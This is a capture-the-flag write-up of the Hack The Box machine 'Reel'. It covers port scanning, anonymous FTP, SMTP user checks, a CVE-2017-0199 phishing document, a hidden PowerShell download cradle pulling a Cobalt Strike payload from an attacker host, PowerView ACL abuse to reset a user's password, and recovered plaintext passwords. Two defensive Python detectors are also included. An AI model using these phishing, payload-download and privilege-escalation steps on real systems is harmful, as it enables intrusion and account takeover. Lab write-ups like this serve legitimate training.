Hack The Box - Reel

Port scan analysis:

nmap -sV -sC -Pn -p- -T4 10.10.10.77
Nmap scan report for 10.10.10.77
Host is up (0.16s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18 12:19AM <DIR> documents
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| TerminalServerCookie:
| 220 Mail Service ready
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2012 R2 Standard 9600 microsoft-ds (workgroup: HTB)
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49159/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -19m58s, deviation: 34m35s, median: 0s
| smb2-time:
| date: 2022-04-06T08:32:23
|_ start_date: 2022-04-06T08:26:16
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 3.0.2:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2012 R2 Standard 9600 (Windows Server 2012 R2 Standard 6.3)
| OS CPE: cpe:/o:microsoft:windows_server_2012::-
| Computer name: REEL
| NetBIOS computer name: REEL\x00
| Domain name: HTB.LOCAL
| Forest name: HTB.LOCAL
| FQDN: REEL.HTB.LOCAL
|_ System time: 2022-04-06T09:32:22+01:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 390.29 seconds

Nmap enumerated FTP on 21, SSH on 22, SMTP on 25 (marked with a question mark, so Nmap could not confirm it), SMB on 445, ncacn_http on 593, msrpc on 135 and 49159, and netbios-ssn on 139.

The target also appears to be domain-joined: the operating system is Windows Server 2012, the hostname is REEL, the NetBIOS name is REEL\x00, the domain and forest are both HTB.LOCAL, and the FQDN is REEL.HTB.LOCAL. Its clock differs noticeably from mine, which means that if I need to schedule any tasks I must first check the target's current system time.

Accessing FTP:

First I can try the FTP port. Nmap reported Anonymous FTP login allowed, so I can log in as anonymous and see whether the shared files give away any information:

ftp 10.10.10.77
Connected to 10.10.10.77.
220 Microsoft FTP Service
Name (10.10.10.77:worldisend): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.

I am logged in, so I can run dir to see what is shared:

ftp> dir
229 Entering Extended Passive Mode (|||41001|)
125 Data connection already open; Transfer starting.
05-29-18 12:19AM <DIR> documents
226 Transfer complete.
ftp> cd documents
250 CWD command successful.
ftp> type documents
documents: unknown mode.
ftp> dir
229 Entering Extended Passive Mode (|||41002|)
125 Data connection already open; Transfer starting.
05-29-18 12:19AM 2047 AppLocker.docx
05-28-18 02:01PM 124 readme.txt
10-31-17 10:13PM 14581 Windows Event Forwarding.docx
226 Transfer complete.

The FTP root holds one directory, documents, which contains two docx documents and a txt file. I can download them to my machine to look at them.

ftp> prompt
Interactive mode off.
ftp> mget *
local: AppLocker.docx remote: AppLocker.docx
229 Entering Extended Passive Mode (|||41009|)
150 Opening ASCII mode data connection.
100% |***************************************************************************************************************************| 2047 6.94 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 9 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
2047 bytes received in 00:00 (4.65 KiB/s)
local: readme.txt remote: readme.txt
229 Entering Extended Passive Mode (|||41010|)
125 Data connection already open; Transfer starting.
100% |***************************************************************************************************************************| 124 0.36 KiB/s 00:00 ETA
226 Transfer complete.
124 bytes received in 00:00 (0.25 KiB/s)
local: Windows Event Forwarding.docx remote: Windows Event Forwarding.docx
229 Entering Extended Passive Mode (|||41011|)
125 Data connection already open; Transfer starting.
100% |***************************************************************************************************************************| 14581 18.54 KiB/s 00:00 ETA
226 Transfer complete.
WARNING! 51 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
14581 bytes received in 00:00 (15.62 KiB/s)

This is the content of readme.txt; it seems to be asking me to email it a document in RTF format:

please email me any rtf format procedures - I'll review and convert.

new format / converted documents will be saved here.

AppLocker.docx describes which programs are restricted from running:

AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.

Windows Event Forwarding.docx: I don't yet know what this is for. It looks like a set of command notes, something like an event relay:

# get winrm config
winrm get winrm/config
# gpo config
O:BAG:SYD:(A;;0xf0005;;;SY)(A;;0x5;;;BA)(A;;0x1;;;S-1-5-32-573)(A;;0x1;;;NS) // add to GPO
Server=http://WEF.HTB.LOCAL:5985/wsman/SubscriptionManager/WEC,Refresh=60 // add to GPO (60 seconds)
on source computer: gpupdate /force
# prereqs
start Windows Remote Management service on source computer
add builtin\network service account to "Event Log Readers" group on collector server
# list subscriptions / export
C:\Windows\system32>wecutil es > subs.txt
# check subscription status
C:\Windows\system32>wecutil gr "Account Currently Disabled"
Subscription: Account Currently Disabled
RunTimeStatus: Active
LastError: 0
EventSources:
LAPTOP12.HTB.LOCAL
RunTimeStatus: Active
LastError: 0
LastHeartbeatTime: 2017-07-11T13:27:00.920

# change pre-rendering setting in multiple subscriptions
for /F "tokens=*" %i in (subs.txt) DO wecutil ss "%i" /cf:Events
# export subscriptions to xml
for /F "tokens=*" %i in (subs.txt) DO wecutil gs "%i" /f:xml >> "%i.xml"
# import subscriptions from xml
wecutil cs "Event Log Service Shutdown.xml"
wecutil cs "Event Log was cleared.xml"
# if get error "The locale specific resource for the desired message is not present", change subscriptions to Event format (won't do any hard running command even if they already are in this format)
1.
for /F "tokens=*" %i in (subs.txt) DO wecutil ss "%i" /cf:Events
2.
Under Windows Regional Settings, on the Formats tab, change the format to "English (United States)"
# check subscriptions are being created on the source computer
Event Log: /Applications and Services Logs/Microsoft/Windows/Eventlog-ForwardingPlugin/Operational
#### troubleshooting WEF
collector server -> subscription name -> runtime status
gpupdate /force (force checkin, get subscriptions)
check Microsoft/Windows/Eventlog-ForwardingPlugin/Operational for errors

Still, I can use exiftool to look at its metadata:

exiftool Windows\ Event\ Forwarding.docx
ExifTool Version Number         : 12.40
File Name : Windows Event Forwarding.docx
Directory : .
File Size : 14 KiB
File Modification Date/Time : 2017:11:01 05:13:23+08:00
File Access Date/Time : 2022:04:06 16:51:32+08:00
File Inode Change Date/Time : 2022:04:06 16:51:32+08:00
File Permissions : -rw-r--r--
File Type : DOCX
File Type Extension : docx
MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document
Zip Required Version : 20
Zip Bit Flag : 0x0006
Zip Compression : Deflated
Zip Modify Date : 1980:01:01 00:00:00
Zip CRC : 0x82872409
Zip Compressed Size : 385
Zip Uncompressed Size : 1422
Zip File Name : [Content_Types].xml
Creator : nico@megabank.com
Revision Number : 4
Create Date : 2017:10:31 18:42:00Z
Modify Date : 2017:10:31 18:51:00Z
Template : Normal.dotm
Total Edit Time : 5 minutes
Pages : 2
Words : 299
Characters : 1709
Application : Microsoft Office Word
Doc Security : None
Lines : 14
Paragraphs : 4
Scale Crop : No
Heading Pairs : Title, 1
Titles Of Parts :
Company :
Links Up To Date : No
Characters With Spaces : 2004
Shared Doc : No
Hyperlinks Changed : No
App Version : 14.0000

I got a string that looks like an email address: nico@megabank.com[1]. The other files contained nothing useful.

SMTP:

The OpenSSH version on port 22 has no ready-made exploit, and I don't plan to brute-force logins yet. First I'll use the SMTP service to verify whether the email address I found is actually usable. I can connect to SMTP with the following command:

telnet 10.10.10.77 25

Then I can test whether SMTP works normally; the SMTP commands are listed here:

https://www.ibm.com/docs/en/zos/2.2.0?topic=commands-smtp

Trying 10.10.10.77...
Connected to 10.10.10.77.
Escape character is '^]'.
220 Mail Service ready
HELO worldisend.com // tell it who I am
250 Hello.

MAIL FROM:worldis@end.com // declare the sender address
250 OK

RCPT TO:@megabank.com> // declare the recipient address
250 OK // if the recipient address exists, it returns 250

RCPT TO: @megabank.com>
// if the mail server finds no matching address in its domain
550 Unknown user // it returns 550 Unknown user

So in a real engagement smtp-user-enum can be used to enumerate email addresses, for example:

smtp-user-enum -M RCPT -U user@.txt -t 10.10.10.77

Metasploit also has a corresponding SMTP enumeration module, but for some unknown reason I couldn't get it to work; here I only need to verify that nico@megabank.com[2] is usable.
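The defender-side counterpart of the RCPT TO probing above: the following is an added example (not part of this write-up and not code from smtp-user-enum) that scores a mail server's RCPT log per client and flags sources that sweep many recipients and get mostly 550 replies, listing the accounts they confirmed so the defender knows where phishing will land next. The log layout, the second client IP and the thresholds are constructed for the example.

```python
"""Spot RCPT TO recipient harvesting in mail-server logs (added example).

Log format is constructed for this example:
    <timestamp> <client-ip> <SMTP command ...> <reply-code>
Adapt parse_rcpt_events() to your MTA's real log layout."""
from collections import defaultdict

# Constructed sample: 10.10.16.5 sends one real message (as in the
# write-up); 10.10.14.9 (assumed address) sweeps a wordlist of recipients
# and is told 550 for every name that does not exist.
SAMPLE_LOG = """\
2022-04-06T20:25:48 10.10.16.5 EHLO google 250
2022-04-06T20:25:48 10.10.16.5 MAIL FROM:<worldis@end.com> 250
2022-04-06T20:25:49 10.10.16.5 RCPT TO:<nico@megabank.com> 250
2022-04-06T20:25:49 10.10.16.5 DATA 354
2022-04-06T20:30:01 10.10.14.9 HELO scanner 250
2022-04-06T20:30:01 10.10.14.9 MAIL FROM:<x@example.org> 250
2022-04-06T20:30:01 10.10.14.9 RCPT TO:<admin@megabank.com> 550
2022-04-06T20:30:01 10.10.14.9 RCPT TO:<alice@megabank.com> 550
2022-04-06T20:30:02 10.10.14.9 RCPT TO:<bob@megabank.com> 550
2022-04-06T20:30:02 10.10.14.9 RCPT TO:<nico@megabank.com> 250
2022-04-06T20:30:02 10.10.14.9 RCPT TO:<tom@megabank.com> 550
2022-04-06T20:30:03 10.10.14.9 RCPT TO:<claire@megabank.com> 550
"""

def parse_rcpt_events(log_text):
    """Yield (client_ip, recipient, reply_code) for every RCPT TO line."""
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[2].upper() != "RCPT":
            continue
        recipient = parts[3].split(":", 1)[1].strip("<>").lower()
        yield parts[1], recipient, int(parts[4])

def detect_enumeration(log_text, min_recipients=5, max_accept_ratio=0.5):
    """Return {client_ip: summary} for clients whose RCPT pattern looks like
    a directory harvest: many distinct recipients, most of them rejected.

    A genuine sender addresses a few known mailboxes and is rarely refused;
    an enumerator is refused for most of its wordlist. The summary lists the
    accounts the client confirmed, i.e. who to expect phishing at."""
    stats = defaultdict(lambda: {"seen": set(), "valid": set(),
                                 "accepted": 0, "rejected": 0})
    for ip, rcpt, code in parse_rcpt_events(log_text):
        s = stats[ip]
        s["seen"].add(rcpt)
        if code == 250:
            s["accepted"] += 1
            s["valid"].add(rcpt)
        elif code == 550:
            s["rejected"] += 1
    flagged = {}
    for ip, s in stats.items():
        total = s["accepted"] + s["rejected"]
        if len(s["seen"]) < min_recipients or total == 0:
            continue
        if s["accepted"] / total <= max_accept_ratio:
            flagged[ip] = {"distinct_recipients": len(s["seen"]),
                           "rejected": s["rejected"],
                           "confirmed_accounts": sorted(s["valid"])}
    return flagged
```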

Phishing with RTF Dynamite:

When Reel was released there was a popular RTF vulnerability, CVE-2017-0199[3], that was being used very widely in attacks. An RTF document carrying malicious code is sent to the target user; when the target opens it, the embedded code downloads a payload from the attacker's server and executes it, giving the attacker a shell as that user. Metasploit has a built-in module for this vulnerability:

msf-pro exploit(multi/handler) > search CVE-2017-0199

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/fileformat/office_word_hta 2017-04-14 excellent No Microsoft Office Word Malicious Hta Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/fileformat/office_word_hta

msf-pro exploit(multi/handler) > use 0
msf-pro exploit(windows/fileformat/office_word_hta) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.16.5:4444
msf-pro exploit(windows/fileformat/office_word_hta) > [+] msf.doc stored at /root/.msf4/local/msf.doc
[*] Using URL: http://10.10.16.5:8080/default.hta
[*] Server started.

Then send the document to the target:

sendEmail -f worldis@end.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a /root/.msf4/local/msf.doc -s 10.10.10.77 -v

sendEmail options used:

-f sender address; it can be any address as long as the domain exists
-t recipient address, nico@megabank.com[4]
-u subject
-m body
-a attachment
-s SMTP server
-v verbose

Apr 06 20:25:47 google sendEmail[25402]: DEBUG => Connecting to 10.10.10.77:25
Apr 06 20:25:48 google sendEmail[25402]: DEBUG => My IP address is: 10.10.16.5
Apr 06 20:25:48 google sendEmail[25402]: SUCCESS => Received: 220 Mail Service ready
Apr 06 20:25:48 google sendEmail[25402]: INFO => Sending: EHLO google
Apr 06 20:25:48 google sendEmail[25402]: SUCCESS => Received: 250-REEL, 250-SIZE 20480000, 250-AUTH LOGIN PLAIN, 250 HELP
Apr 06 20:25:48 google sendEmail[25402]: INFO => Sending: MAIL FROM:
Apr 06 20:25:48 google sendEmail[25402]: SUCCESS => Received: 250 OK
Apr 06 20:25:48 google sendEmail[25402]: INFO => Sending: RCPT TO:
Apr 06 20:25:49 google sendEmail[25402]: SUCCESS => Received: 250 OK
Apr 06 20:25:49 google sendEmail[25402]: INFO => Sending: DATA
Apr 06 20:25:49 google sendEmail[25402]: SUCCESS => Received: 354 OK, send.
Apr 06 20:25:49 google sendEmail[25402]: INFO => Sending message body
Apr 06 20:25:49 google sendEmail[25402]: Setting content-type: text/plain
Apr 06 20:25:49 google sendEmail[25402]: DEBUG => Sending the attachment [Invoice.rtf]
Apr 06 20:26:01 google sendEmail[25402]: SUCCESS => Received: 250 Queued (12.484 seconds)
Apr 06 20:26:01 google sendEmail[25402]: Email was sent successfully! From: <worldis@end.com> To: Subject: [Invoice Attached] Attachment(s): [Invoice.rtf] Server: [10.10.10.77:25]

After a while a Meterpreter session comes in; I can't say exactly how long it takes:

[*] Started reverse TCP handler on 10.10.16.5:4444 
[*] Sending stage (175174 bytes) to 10.10.10.77
[*] Meterpreter session 1 opened (10.10.16.5:4444 -> 10.10.10.77:56042 ) at 2022-04-06 20:26:27 +0800

meterpreter > whoami
[-] Unknown command: whoami
meterpreter > getuid
Server username: HTB\nico
meterpreter >

Initial access:

user.txt can then be found in C:\Users\nico\Desktop:

C:\Users\nico\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1

Directory of C:\Users\nico\Desktop

28/05/2018 21:07 <DIR> .
28/05/2018 21:07 <DIR> ..
28/10/2017 00:59 1,468 cred.xml
28/10/2017 00:40 32 user.txt
2 File(s) 1,500 bytes
2 Dir(s) 15,768,559,616 bytes free

C:\Users\nico\Desktop>

There is a cred.xml on nico's desktop. I opened it and saw a Password field:

C:\Users\nico\Desktop>type cred.xml
type cred.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">HTB\Tom</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
</Props>
</Obj>
</Objs>

PowerShell has an object type called PSCredential that stores a username and password, and two cmdlets, Export-CliXml and Import-CliXml, that save such credentials to a file and load them back. Export-CliXml protects the password with DPAPI under the exporting user's key, so the file can only be turned back into plaintext by that same user on that machine, which is why running Import-CliXml as nico works here.

I can load the file with Import-CliXml, recover the plaintext password, and dump the result:

C:\Users\nico\Desktop>powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"

UserName : Tom
Password : 1ts-mag1c!!!
SecurePassword : System.Security.SecureString
Domain : HTB

C:\Users\nico\Desktop>

I can connect over SSH as Tom to get Tom's privileges:

ssh tom@10.10.10.77
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

tom@REEL C:\Users\tom>

On Tom's desktop, the AD Audit directory contains note.txt:

tom@REEL C:\Users\tom\Desktop\AD Audit>dir
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1

Directory of C:\Users\tom\Desktop\AD Audit

05/29/2018 09:02 PM <DIR> .
05/29/2018 09:02 PM <DIR> ..
05/30/2018 12:44 AM <DIR> BloodHound
05/29/2018 09:02 PM 182 note.txt
1 File(s) 182 bytes
3 Dir(s) 15,768,489,984 bytes free

tom@REEL C:\Users\tom\Desktop\AD Audit>type note.txt
Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
Maybe we should re-run Cypher query against other groups we've created.
tom@REEL C:\Users\tom\Desktop\AD Audit>

Going deeper into the directory, the box has thoughtfully prepared a lot of files for me:

Directory of C:\Users\tom\Desktop\AD Audit\BloodHound

05/30/2018 12:44 AM <DIR> .
05/30/2018 12:44 AM <DIR> ..
05/29/2018 08:57 PM <DIR> Ingestors
10/30/2017 11:15 PM 769,587 PowerView.ps1
1 File(s) 769,587 bytes
3 Dir(s) 15,768,489,984 bytes free

tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound>cd Ingestors
tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors>DIR
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1

Directory of C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors

05/29/2018 08:57 PM <DIR> .
05/29/2018 08:57 PM <DIR> ..
11/17/2017 12:50 AM 112,225 acls.csv
10/28/2017 09:50 PM 3,549 BloodHound.bin
10/24/2017 04:27 PM 246,489 BloodHound_Old.ps1
10/24/2017 04:27 PM 568,832 SharpHound.exe
10/24/2017 04:27 PM 636,959 SharpHound.ps1
5 File(s) 1,568,054 bytes
2 Dir(s) 15,768,489,984 bytes free

To make interacting with the target easier I used CobaltStrike to deliver a web payload as Tom, since I have Tom's terminal; Metasploit failed for some reason:

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.16.9:80/a'))"

I downloaded acls.csv through CobaltStrike. It contains a huge amount of information about the users and groups in the target domain, far too much to read by eye. The current BloodHound no longer parses csv, but the old version 1.5.2 does:

https://github.com/BloodHoundAD/BloodHound/releases/tag/1.5.2

I then found a backup group, Backup_admin: CLAIRE has WriteDacl over it, and Tom has Owns. And the box prepared PowerView for me in C:\Users\tom\Desktop\AD Audit\BloodHound.

tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound>powershell
Windows PowerShell
Copyright (C) 2014 Microsoft Corporation. All rights reserved.

PS C:\Users\tom\Desktop\AD Audit\BloodHound> . .\PowerView.ps1

Note the " . ": with a single " . " it will error because the scope is different; see the official Microsoft PowerShell documentation for the details:

https://docs.microsoft.com/zh-cn/powershell/module/microsoft.powershell.core/about/about_scripts?view=powershell-7.2

Then I make Tom the owner of claire's ACL:

Set-DomainObjectOwner -identity claire -OwnerIdentity tom

I grant Tom the right to reset the password in claire's ACL:

Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword

Then I create a password credential object:

$cred = ConvertTo-SecureString "qwerQWER1234!@#$" -AsPlainText -force

and set it as claire's login password:

Set-DomainUserPassword -identity claire -accountpassword $cred

Now I can log in to the target over SSH as claire:

ssh claire@10.10.10.77
claire@10.10.10.77's password:
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

claire@REEL C:\Users\claire>

First I can look at the members of the Backup_admin backup group:

net group backup_admins
Group name     Backup_Admins
Comment

Members

-------------------------------------------------------------------------------
ranj
The command completed successfully.

Its only member is ranj; I can add claire to it:

net group backup_admins claire /add
Group name     Backup_Admins
Comment

Members

-------------------------------------------------------------------------------
claire ranj
The command completed successfully.

I need to close the SSH connection and log in again so the new group membership takes effect. Then I can try to access the Administrator directory; I try to read root.txt, but it refuses:

Directory of C:\Users\Administrator\Desktop

01/21/2018 02:56 PM <DIR> .
01/21/2018 02:56 PM <DIR> ..
11/02/2017 09:47 PM <DIR> Backup Scripts
10/28/2017 11:56 AM 32 root.txt
1 File(s) 32 bytes
3 Dir(s) 15,725,092,864 bytes free

claire@REEL C:\Users\Administrator\Desktop>type root.txt
Access is denied.

Then I notice a Backup Scripts directory in there; inside it I find some backup scripts:

Directory of C:\Users\Administrator\Desktop\Backup Scripts

11/02/2017 09:47 PM <DIR> .
11/02/2017 09:47 PM <DIR> ..
11/03/2017 11:22 PM 845 backup.ps1
11/02/2017 09:37 PM 462 backup1.ps1
11/03/2017 11:21 PM 5,642 BackupScript.ps1
11/02/2017 09:43 PM 2,791 BackupScript.zip
11/03/2017 11:22 PM 1,855 folders-system-state.txt
11/03/2017 11:22 PM 308 test2.ps1.txt
6 File(s) 11,903 bytes
2 Dir(s) 15,725,092,864 bytes free

And BackupScript.ps1 contains this line:

# admin password
$password="Cr4ckMeIfYouC4n!"
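Both credential exposures found on this box, the Export-CliXml PSCredential in cred.xml and the plaintext $password in BackupScript.ps1, are the kind of thing an audit script should catch before an attacker does. The following is an added example (not from the write-up or the box) that parses CliXml for PSCredential objects, recognises a DPAPI-protected SecureString by its header, and scans PowerShell scripts for literal password assignments; the file contents are constructed samples modelled on the page's findings, and the variable-name pattern is an assumption.

```python
"""Audit files for credentials left at rest (added example, not from the box):
a PSCredential saved with Export-CliXml (cred.xml) and a plaintext password
assigned in a PowerShell script (BackupScript.ps1). Samples are constructed."""
import re
import xml.etree.ElementTree as ET

PS_NS = "{http://schemas.microsoft.com/powershell/2004/04}"
# A DPAPI blob begins with version 1 and the provider GUID
# df9d8cd0-1501-11d1-8c7a-00c04fc297eb in little-endian byte order,
# which is exactly how the Password value in cred.xml started.
DPAPI_MAGIC = "01000000d08c9ddf0115d1118c7a00c04fc297eb"
HARDCODED_RE = re.compile(  # common secret variable names; extend as needed
    r"^\s*(\$(?:pass(?:word|wd)?|pwd|secret))\s*=\s*([\"'])(.+?)\2",
    re.IGNORECASE | re.MULTILINE)

# Constructed CliXml export; the blob is the DPAPI header plus filler.
SAMPLE_CLIXML = f"""<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">HTB\\Tom</S>
      <SS N="Password">{DPAPI_MAGIC}0000000000000000</SS>
    </Props>
  </Obj>
</Objs>"""
# Constructed script modelled on BackupScript.ps1.
SAMPLE_SCRIPT = """$dest = "\\\\backup01\\share"
# admin password
$password="Cr4ckMeIfYouC4n!"
"""

def find_clixml_credentials(xml_text):
    """Return [(username, is_dpapi_blob)] per PSCredential in a CliXml export.
    The SecureString is encrypted with the exporting user's DPAPI key, so any
    process running as that user gets plaintext back via Import-CliXml."""
    found = []
    for obj in ET.fromstring(xml_text).iter(f"{PS_NS}Obj"):
        types = {t.text for t in obj.iter(f"{PS_NS}T")}
        if "System.Management.Automation.PSCredential" not in types:
            continue
        user = obj.find(f"{PS_NS}Props/{PS_NS}S[@N='UserName']")
        pw = obj.find(f"{PS_NS}Props/{PS_NS}SS[@N='Password']")
        blob = (pw.text or "") if pw is not None else ""
        found.append((user.text if user is not None else "?",
                      blob.lower().startswith(DPAPI_MAGIC)))
    return found

def find_hardcoded_passwords(script_text):
    """Return the variable names that are assigned a literal password."""
    return [m.group(1) for m in HARDCODED_RE.finditer(script_text)]

def audit(files):
    """files maps file name -> text; returns one finding per exposure.
    Secret values are deliberately kept out of the report."""
    report = []
    for name, text in files.items():
        if name.lower().endswith(".xml") and "<Objs" in text:
            for user, dpapi in find_clixml_credentials(text):
                how = "DPAPI SecureString" if dpapi else "unrecognised encoding"
                report.append(f"{name}: exported PSCredential for {user} ({how})")
        elif name.lower().endswith((".ps1", ".psm1")):
            for var in find_hardcoded_passwords(text):
                report.append(f"{name}: literal password assigned to {var}")
    return report
```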

Getting Administrator:

I try logging in as administrator with this password:

ssh administrator@10.10.10.77

The login succeeded, and I can now read root.txt:

administrator@REEL C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is CC8A-33E1

Directory of C:\Users\Administrator\Desktop

21/01/2018 15:56 <DIR> .
21/01/2018 15:56 <DIR> ..
02/11/2017 22:47 <DIR> Backup Scripts
28/10/2017 12:56 32 root.txt
1 File(s) 32 bytes
3 Dir(s) 15,757,074,432 bytes free

administrator@REEL C:\Users\Administrator\Desktop>type root.txt

References

[1] nico@megabank.com: mailto:nico@megabank.com
[2] nico@megabank.com: mailto:nico@megabank.com
[3] CVE-2017-0199: https://nvd.nist.gov/vuln/detail/CVE-2017-0199
[4] nico@megabank.com: mailto:nico@megabank.com

